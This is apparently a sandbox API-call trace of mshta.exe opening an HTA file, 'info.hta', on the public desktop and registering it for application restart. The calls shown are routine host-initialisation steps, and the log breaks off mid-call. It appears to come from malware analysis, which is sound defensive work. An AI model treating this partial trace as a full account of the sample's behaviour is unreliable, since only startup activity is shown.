[0221.572] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76180000 [0221.572] GetProcAddress (hModule=0x76180000, lpProcName="RegisterApplicationRestart") returned 0x761bb53c [0221.572] lstrlenA (lpString="\"C:\\users\\public\\desktop\\info.hta\" ") returned 35 [0221.572] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x0, Size=0x48) returned 0x331d28 [0221.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x512ab0, cbMultiByte=-1, lpWideCharStr=0x331d28, cchWideChar=36 | out: lpWideCharStr="\"C:\\users\\public\\desktop\\info.hta\" ") returned 36 [0221.572] RegisterApplicationRestart (pwzCommandline="\"C:\\users\\public\\desktop\\info.hta\" ", dwFlags=0x0) returned 0x0 [0221.572] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x331d28 | out: hHeap=0x330000) returned 1 [0221.572] GetProcAddress (hModule=0x73f40000, lpProcName="RunHTMLApplication") returned 0x73f9e710 [0221.971] GetCommandLineW () returned="\"C:\\Windows\\SysWOW64\\mshta.exe\" \"C:\\users\\public\\desktop\\info.hta\" " [0222.099] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x4c) returned 0x535330 [0222.099] OleInitialize (pvReserved=0x0) returned 0x0 [0222.119] IsWindow (hWnd=0x0) returned 0 [0222.119] RegisterClassW (lpWndClass=0x14f65c) returned 0xc14d [0222.120] CreateWindowExW (dwExStyle=0x0, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xb40000, lpParam=0x74479680) returned 0x6014e [0222.120] NtdllDefWindowProc_W () returned 0x0 [0222.120] NtdllDefWindowProc_W () returned 0x1 [0222.123] NtdllDefWindowProc_W () returned 0x0 [0222.286] NtdllDefWindowProc_W () returned 0x0 [0222.286] CreateWindowExW (dwExStyle=0x40000, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x2cf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x6014e, hMenu=0x0, hInstance=0xb40000, lpParam=0x74479680) returned 0x20158 [0222.286] NtdllDefWindowProc_W () returned 0x0 [0222.286] NtdllDefWindowProc_W () returned 0x1 [0222.286] NtdllDefWindowProc_W () returned 0x0 [0222.286] NtdllDefWindowProc_W () returned 0x0 [0222.286] SetWindowLongW (hWnd=0x20158, nIndex=-16, dwNewLong=-2100363264) returned 114229248 [0222.287] NtdllDefWindowProc_W () returned 0x0 [0222.287] NtdllDefWindowProc_W () returned 0x0 [0222.287] NtdllDefWindowProc_W () returned 0x0 [0222.287] NtdllDefWindowProc_W () returned 0x0 [0222.287] NtdllDefWindowProc_W () returned 0x0 [0222.287] NtdllDefWindowProc_W () returned 0x0 [0222.287] SetWindowPos (hWnd=0x20158, hWndInsertAfter=0xfffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0222.287] NtdllDefWindowProc_W () returned 0x0 [0222.287] NtdllDefWindowProc_W () returned 0x0 [0222.288] NtdllDefWindowProc_W () returned 0x0 [0222.288] NtdllDefWindowProc_W () returned 0x0 [0222.288] NtdllDefWindowProc_W () returned 0x0 [0222.289] SendMessageW (hWnd=0x20158, Msg=0x127, wParam=0x3, lParam=0x0) returned 0x0 [0222.289] NtdllDefWindowProc_W () returned 0x0 [0222.289] NtdllDefWindowProc_W () returned 0x0 [0222.366] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x4c) returned 0x53ab08 [0222.366] PathRemoveArgsW (in: pszPath="\"C:\\users\\public\\desktop\\info.hta\" " | out: pszPath="\"C:\\users\\public\\desktop\\info.hta\"") [0222.366] PathRemoveBlanksW (in: pszPath="\"C:\\users\\public\\desktop\\info.hta\"" | out: pszPath="\"C:\\users\\public\\desktop\\info.hta\"") [0222.366] PathUnquoteSpacesW (in: lpsz="\"C:\\users\\public\\desktop\\info.hta\"" | out: lpsz="C:\\users\\public\\desktop\\info.hta") returned 1 [0222.519] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="C:\\users\\public\\desktop\\info.hta", ppmk=0x14f6bc*=0x0, dwFlags=0x1 | out: ppmk=0x14f6bc*=0x5205b0) returned 0x0 [0222.523] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x53ab08 | out: hHeap=0x510000) returned 1 [0222.523] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x53b378 [0222.524] CoCreateInstance (in: rclsid=0x74079770*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x740fb75c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x744796d4 | out: ppv=0x744796d4*=0x541f78) returned 0x0 [0222.530] DllGetClassObject (in: rclsid=0x53f644*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x74caee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x14e974 | out: ppv=0x14e974*=0x74478cb0) returned 0x0 [0222.687] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x2a8) returned 0x540440 [0222.835] GetCurrentThreadId () returned 0xc4 [0222.951] RegisterClassExW (param_1=0x14e80c) returned 0xc14e [0222.951] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc14e, lpWindowName=0x0, dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x73f40000, lpParam=0x0) returned 0x2019a [0222.951] GetWindowLongW (hWnd=0x2019a, nIndex=-20) returned 0 [0222.952] NtdllDefWindowProc_W () returned 0x1 [0222.952] NtdllDefWindowProc_W () returned 0x0 [0222.952] NtdllDefWindowProc_W () returned 0x0 [0222.952] NtdllDefWindowProc_W () returned 0x0 [0222.952] NtdllDefWindowProc_W () returned 0x0 [0222.952] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x53b450 [0222.952] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x53b468 [0222.952] CreateCompatibleDC (hdc=0x0) returned 0x6e010778 [0222.952] GetDeviceCaps (hdc=0x6e010778, index=90) returned 96 [0222.952] GetDeviceCaps (hdc=0x6e010778, index=88) returned 96 [0222.952] GetSystemMetrics (nIndex=68) returned 4 [0222.952] GetSystemMetrics (nIndex=69) returned 4 [0222.952] GetSystemMetrics (nIndex=2) returned 17 [0222.952] GetSystemMetrics (nIndex=3) returned 17 [0222.952] GetStockObject (i=13) returned 0x18a002e [0222.952] SelectObject (hdc=0x6e010778, h=0x18a002e) returned 0x18a002e [0222.952] GetTextMetricsW (in: hdc=0x6e010778, lptm=0x14e8a4 | out: lptm=0x14e8a4) returned 1 [0222.952] SelectObject (hdc=0x6e010778, h=0x18a002e) returned 0x18a002e [0222.952] DeleteObject (ho=0x18a002e) returned 1 [0222.952] GetSystemDefaultLCID () returned 0x409 [0222.952] GetUserDefaultLCID () returned 0x409 [0222.953] GetACP () returned 0x4e4 [0222.953] GetLocaleInfoW (in: Locale=0x400, LCType=0x1014, lpLCData=0x14e818, cchData=41 | out: lpLCData="1") returned 2 [0222.953] _wtoi (_String="1") returned 1 [0222.953] RegCloseKey (hKey=0x0) returned 0x6 [0222.953] GetLocaleInfoW (in: Locale=0x400, LCType=0x13, lpLCData=0x14e86c, cchData=16 | out: lpLCData="0123456789") returned 11 [0222.953] SystemParametersInfoW (in: uiAction=0x46, uiParam=0x0, pvParam=0x7447b038, fWinIni=0x0 | out: pvParam=0x7447b038) returned 1 [0222.953] SystemParametersInfoW (in: uiAction=0x42, uiParam=0xc, pvParam=0x14e8e0, fWinIni=0x0 | out: pvParam=0x14e8e0) returned 1 [0222.953] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xc0) returned 0x5407f8 [0222.953] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x53b480 [0222.953] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xa4) returned 0x5408c0 [0222.953] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x14) returned 0x5332b8 [0222.953] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x1c) returned 0x536d28 [0222.953] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x44) returned 0x529220 [0222.953] GetSystemWindowsDirectoryW (in: lpBuffer=0x14e6ec, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0222.953] lstrlenW (lpString="C:\\Windows") returned 10 [0222.953] lstrlenW (lpString="\\WindowsShell.manifest") returned 22 [0222.953] CreateActCtxW (pActCtx=0x14e6c8) returned 0x540974 [0222.954] ActivateActCtx (in: hActCtx=0x540974, lpCookie=0x14e698 | out: hActCtx=0x540974, lpCookie=0x14e698) returned 1 [0222.954] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x74720000 [0222.958] DeactivateActCtx (dwFlags=0x0, ulCookie=0x15ac0001) returned 1 [0222.958] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInset", nDefault=11) returned 0xb [0222.958] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollDelay", nDefault=50) returned 0x32 [0222.959] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=200) returned 0xc8 [0222.959] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInterval", nDefault=50) returned 0x32 [0222.959] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14e2f8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0222.959] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14e500, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0222.959] GetCurrentProcess () returned 0xffffffff [0222.959] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x0, lpBaseName=0x14e708, nSize=0x104 | out: lpBaseName="mshta.exe") returned 0x9 [0222.959] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0222.959] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x14) returned 0x5332d8 [0222.959] FindAtomW (lpString="TridentEnableHiRes") returned 0x0 [0222.959] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", pszValue="NoFileMenu", pdwType=0x14e2e4, pvData=0x14e2f0, pcbData=0x14e2ec*=0x4 | out: pdwType=0x14e2e4*=0x0, pvData=0x14e2f0, pcbData=0x14e2ec*=0x4) returned 0x2 [0222.960] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14e25c | out: phkResult=0x14e25c*=0x168) returned 0x0 [0222.960] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14e260 | out: phkResult=0x14e260*=0x164) returned 0x0 [0222.960] RegOpenKeyExW (in: hKey=0x164, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x14e21c | out: phkResult=0x14e21c*=0x0) returned 0x2 [0222.960] RegOpenKeyExW (in: hKey=0x168, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x14e21c | out: phkResult=0x14e21c*=0x0) returned 0x2 [0222.960] RegCloseKey (hKey=0x0) returned 0x6 [0222.960] RegCloseKey (hKey=0x0) returned 0x6 [0222.960] RegCloseKey (hKey=0x168) returned 0x0 [0222.960] RegCloseKey (hKey=0x164) returned 0x0 [0222.960] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x97c) returned 0x541f78 [0222.960] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x480) returned 0x542900 [0222.960] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0222.960] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0222.960] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0222.960] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0222.961] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x5412f8 [0222.961] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x541350 [0222.961] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x542d88 [0222.961] GetCurrentThreadId () returned 0xc4 [0222.961] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x53b540 [0222.961] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x2c) returned 0x52d658 [0222.961] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x80) returned 0x542de0 [0222.961] RegisterClipboardFormatW (lpszFormat="WM_HTML_GETOBJECT") returned 0xc14f [0222.961] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x18) returned 0x5332f8 [0223.041] CoInternetIsFeatureEnabled (FeatureEntry=0xc, dwFlags=0x2) returned 0x1 [0223.042] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x74478cd4, dwReserved=0x0 | out: ppSM=0x74478cd4*=0x542e68) returned 0x0 [0223.045] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x64) returned 0x543438 [0223.067] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4c) returned 0x5434a8 [0223.067] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x28) returned 0x52cfb0 [0223.067] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x14) returned 0x533318 [0223.067] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x44) returned 0x529270 [0223.067] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x44) returned 0x5292c0 [0223.068] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x60) returned 0x543500 [0223.068] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x64) returned 0x543568 [0223.068] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x44) returned 0x529310 [0223.068] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x60) returned 0x5435d8 [0223.068] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xec) returned 0x543840 [0223.068] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x44) returned 0x529360 [0223.068] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x44) returned 0x5293b0 [0223.068] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x44) returned 0x529400 [0223.068] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x60) returned 0x543938 [0223.068] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x60) returned 0x5439a0 [0223.068] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x44) returned 0x529450 [0223.068] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x44) returned 0x5294a0 [0223.068] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x90) returned 0x543a08 [0223.068] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x140) returned 0x543aa0 [0223.068] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x8) returned 0x53b988 [0223.068] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x28) returned 0x52cfe0 [0223.068] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x18) returned 0x533338 [0223.068] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xd0) returned 0x53c3c8 [0223.068] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x38) returned 0x5413a8 [0223.068] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x128) returned 0x543be8 [0223.068] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x148) returned 0x543d18 [0223.069] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x5c) returned 0x543e68 [0223.069] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x18) returned 0x533358 [0223.069] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x14e60c | out: ppURI=0x14e60c*=0x53bdec) returned 0x0 [0223.069] IUri:GetPropertyDWORD (in: This=0x53bdec, uriProp=0x11, pdwProperty=0x14e5f4, dwFlags=0x0 | out: pdwProperty=0x14e5f4*=0x11) returned 0x0 [0223.069] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x5426ac, dwReserved=0x0 | out: ppSM=0x5426ac*=0x543ed0) returned 0x0 [0223.088] IInternetSecurityManager:SetSecuritySite (This=0x543ed0, pSite=0x5426b4) returned 0x0 [0223.088] IUnknown:AddRef (This=0x5426b4) returned 0x28 [0223.088] IUnknown:QueryInterface (in: This=0x5426b4, riid=0x753261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x14e5c4 | out: ppvObject=0x14e5c4*=0x5426b8) returned 0x0 [0223.089] IServiceProvider:QueryService (in: This=0x5426b8, guidService=0x7532f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7532f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x543ef8 | out: ppvObject=0x543ef8*=0x0) returned 0x80004002 [0223.089] IServiceProvider:QueryService (in: This=0x5426b8, guidService=0x7532f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7532f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x543ef4 | out: ppvObject=0x543ef4*=0x0) returned 0x80004002 [0223.089] IServiceProvider:QueryService (in: This=0x5426b8, guidService=0x7531c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7531c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x543ef0 | out: ppvObject=0x543ef0*=0x0) returned 0x80004002 [0223.089] IUnknown:Release (This=0x5426b8) returned 0x0 [0223.089] IInternetSecurityManager:GetSecurityId (in: This=0x543ed0, pwszUrl="about:blank", pbSecurityId=0x14e660, pcbSecurityId=0x14e654*=0x200, dwReserved=0x0 | out: pbSecurityId=0x14e660*=0x61, pcbSecurityId=0x14e654*=0xf) returned 0x0 [0223.189] DllGetClassObject (in: rclsid=0x53f678*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x14dbe0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x14d298 | out: ppv=0x14d298*=0x74478c70) returned 0x0 [0223.189] IUnknown:AddRef (This=0x74478c70) returned 0x1 [0223.189] IUnknown:Release (This=0x74478c70) returned 0x1 [0223.189] IUnknown:QueryInterface (in: This=0x74478c70, riid=0x75314430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x14de5c | out: ppvObject=0x14de5c*=0x74478c70) returned 0x0 [0223.189] IUnknown:Release (This=0x74478c70) returned 0x1 [0223.189] IUnknown:QueryInterface (in: This=0x74478c70, riid=0x7533aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x14e01c | out: ppvObject=0x14e01c*=0x74478c7c) returned 0x0 [0223.189] IUnknown:Release (This=0x74478c70) returned 0x1 [0223.189] IInternetProtocolInfo:ParseUrl (in: This=0x74478c7c, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x533418, cchResult=0xc, pcchResult=0x14e064, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x14e064*=0xc) returned 0x0 [0223.189] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x1c) returned 0x541730 [0223.189] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0223.189] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x541730 | out: hHeap=0x510000) returned 1 [0223.189] IUnknown:Release (This=0x74478c7c) returned 0x1 [0223.190] DllGetClassObject (in: rclsid=0x53f678*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x75314430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x14df30 | out: ppv=0x14df30*=0x74478c70) returned 0x0 [0223.190] IUnknown:QueryInterface (in: This=0x74478c70, riid=0x7533aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x14e01c | out: ppvObject=0x14e01c*=0x74478c7c) returned 0x0 [0223.190] IUnknown:Release (This=0x74478c70) returned 0x1 [0223.190] IInternetProtocolInfo:ParseUrl (in: This=0x74478c7c, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x533418, cchResult=0xc, pcchResult=0x14e074, dwReserved=0x0 | out: pwzResult="", pcchResult=0x14e074*=0x0) returned 0x800c0011 [0223.190] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0223.190] IUnknown:Release (This=0x74478c7c) returned 0x1 [0223.190] IUnknown:Release (This=0x53bdec) returned 0x2 [0223.190] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0223.190] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xf) returned 0x53b588 [0223.190] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x53b5b8 [0223.190] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x14e634, dwReserved=0x0 | out: ppSM=0x14e634*=0x544430) returned 0x0 [0223.191] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xf) returned 0x53b600 [0223.191] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x544378 [0223.191] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14e7e4 | out: phkResult=0x14e7e4*=0x1b8) returned 0x0 [0223.191] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14e7e8 | out: phkResult=0x14e7e8*=0x1c0) returned 0x0 [0223.191] RegOpenKeyExW (in: hKey=0x1c0, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x14e7a4 | out: phkResult=0x14e7a4*=0x0) returned 0x2 [0223.191] RegOpenKeyExW (in: hKey=0x1b8, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x14e7a4 | out: phkResult=0x14e7a4*=0x0) returned 0x2 [0223.191] RegCloseKey (hKey=0x0) returned 0x6 [0223.191] RegCloseKey (hKey=0x0) returned 0x6 [0223.191] RegCloseKey (hKey=0x1b8) returned 0x0 [0223.191] RegCloseKey (hKey=0x1c0) returned 0x0 [0223.191] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x128) returned 0x5492b8 [0223.191] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4c) returned 0x544498 [0223.191] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x53b648 [0223.191] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x2000) returned 0x5493e8 [0223.192] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x5444f0 [0223.192] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5444f0 | out: hHeap=0x510000) returned 1 [0223.192] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0223.192] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x14e628 | out: ppURI=0x14e628*=0x53bdec) returned 0x0 [0223.192] DllGetClassObject (in: rclsid=0x53f678*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x75314430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x14df00 | out: ppv=0x14df00*=0x74478c70) returned 0x0 [0223.192] IUnknown:QueryInterface (in: This=0x74478c70, riid=0x7533aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x14dfec | out: ppvObject=0x14dfec*=0x74478c7c) returned 0x0 [0223.192] IUnknown:Release (This=0x74478c70) returned 0x1 [0223.192] IInternetProtocolInfo:ParseUrl (in: This=0x74478c7c, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x533418, cchResult=0xc, pcchResult=0x14e034, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x14e034*=0xc) returned 0x0 [0223.192] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x1c) returned 0x541730 [0223.192] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0223.192] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x541730 | out: hHeap=0x510000) returned 1 [0223.192] IUnknown:Release (This=0x74478c7c) returned 0x1 [0223.193] DllGetClassObject (in: rclsid=0x53f678*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x75314430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x14df00 | out: ppv=0x14df00*=0x74478c70) returned 0x0 [0223.193] IUnknown:QueryInterface (in: This=0x74478c70, riid=0x7533aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, 